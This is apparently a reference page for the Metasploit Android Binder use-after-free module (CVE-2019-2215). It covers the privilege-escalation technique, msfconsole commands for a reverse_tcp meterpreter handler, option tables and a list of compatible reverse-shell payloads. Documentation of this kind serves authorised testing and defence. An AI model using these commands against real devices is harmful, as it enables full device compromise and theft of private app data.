Android Binder Use-After-Free Exploit - Metasploit


This page contains detailed information about how to use the exploit/android/local/binder_uaf metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Android Binder Use-After-Free Exploit
Module: exploit/android/local/binder_uaf
Source code: modules/exploits/android/local/binder_uaf.rb
Disclosure date: 2019-09-26
Last modification time: 2022-02-12 21:39:12 +0000
Supported architecture(s): aarch64
Supported platform(s): Android, Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2019-2215

This module exploits CVE-2019-2215, which is a use-after-free in Binder in the Android kernel. The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If chained with a browser renderer exploit, this bug could fully compromise a device through a malicious website. The freed memory is replaced with an iovec structure in order to leak a pointer to the task_struct. Finally the bug is triggered again in order to overwrite the addr_limit, making all memory (including kernel memory) accessible as part of the user-space memory range in our process and allowing arbitrary reading and writing of kernel memory.

Module Ranking and Traits

Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage

Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/android/local/binder_uaf
msf exploit(binder_uaf) > show targets
    ... a list of targets ...
msf exploit(binder_uaf) > set TARGET target-id
msf exploit(binder_uaf) > show options
    ... show and set options ...
msf exploit(binder_uaf) > set SESSION session-id
msf exploit(binder_uaf) > exploit

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

This exploit module currently targets a very specific build of Android on specific set of hardware targets:

  • Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.

This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.

One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken older revisions to the device firmware. This may be a firmware bug or intentional, but Google themselves do not appear to have an answer for the problem. For testing, you may need a phone never updated to a later Android revision.

Verification Steps

  • Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:

msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j

  • Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
uname -a
Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
  • Run the exploit:
msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf
msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR
msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
LPORT => 4448
msf5 exploit(android/local/binder_uaf) > set SESSION -1
SESSION => -1
msf5 exploit(android/local/binder_uaf) > run
  • Verify the new session can read and write private application data (in /data/data/..../)

Scenarios

This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.

Go back to menu.

Msfconsole Usage

Here is how the android/local/binder_uaf exploit module looks in the msfconsole:

msf6 > use exploit/android/local/binder_uaf

[*] Using configured payload linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(android/local/binder_uaf) > show info

       Name: Android Binder Use-After-Free Exploit
     Module: exploit/android/local/binder_uaf
   Platform: Android, Linux
       Arch: aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-09-26

Provided by:
  Jann Horn
  Maddie Stone
  grant-h
  timwr

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module exploits CVE-2019-2215, which is a use-after-free in 
  Binder in the Android kernel. The bug is a local privilege 
  escalation vulnerability that allows for a full compromise of a 
  vulnerable device. If chained with a browser renderer exploit, this 
  bug could fully compromise a device through a malicious website. The 
  freed memory is replaced with an iovec structure in order to leak a 
  pointer to the task_struct. Finally the bug is triggered again in 
  order to overwrite the addr_limit, making all memory (including 
  kernel memory) accessible as part of the user-space memory range in 
  our process and allowing arbitrary reading and writing of kernel 
  memory.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-2215
  https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
  https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html
  https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/
  https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c

Module Options

This is a complete list of options available in the android/local/binder_uaf exploit:

msf6 exploit(android/local/binder_uaf) > show options

Module options (exploit/android/local/binder_uaf):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (linux/aarch64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options

Here is a complete list of advanced options supported by the android/local/binder_uaf exploit:

msf6 exploit(android/local/binder_uaf) > show advanced

Module advanced options (exploit/android/local/binder_uaf):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                5                no        Additional delay in seconds to wait for a session

Payload advanced options (linux/aarch64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the android/local/binder_uaf module can exploit:

msf6 exploit(android/local/binder_uaf) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the android/local/binder_uaf exploit:

msf6 exploit(android/local/binder_uaf) > show payloads

Compatible Payloads
===================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  payload/generic/custom                                            normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                                    normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                                 normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/linux/aarch64/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   4  payload/linux/aarch64/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   5  payload/linux/aarch64/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   6  payload/linux/aarch64/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   7  payload/linux/aarch64/shell/reverse_tcp                           normal  No     Linux dup2 Command Shell, Reverse TCP Stager
   8  payload/linux/aarch64/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options

Here is the full list of possible evasion options supported by the android/local/binder_uaf exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(android/local/binder_uaf) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

  • Jann Horn
  • Maddie Stone
  • grant-h
  • timwr

Version

This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.